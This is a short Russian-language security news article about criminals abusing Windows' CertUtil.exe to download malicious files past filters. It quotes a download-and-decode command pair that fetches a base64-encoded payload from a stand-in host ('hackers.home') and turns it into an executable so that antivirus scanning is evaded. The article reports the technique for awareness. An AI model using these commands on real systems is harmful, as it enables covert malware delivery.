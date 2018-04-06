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CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам
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CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам 

Anti-Malware.ru 1 час назад
Фото: Anti-Malware.ru
Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначены для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.
Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».
Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.
Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.
В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.
Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.
После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:
C:\Temp>certutil.exe -urlcache -split -f «https://hackers.home/badcontent.txt» bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe  Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.
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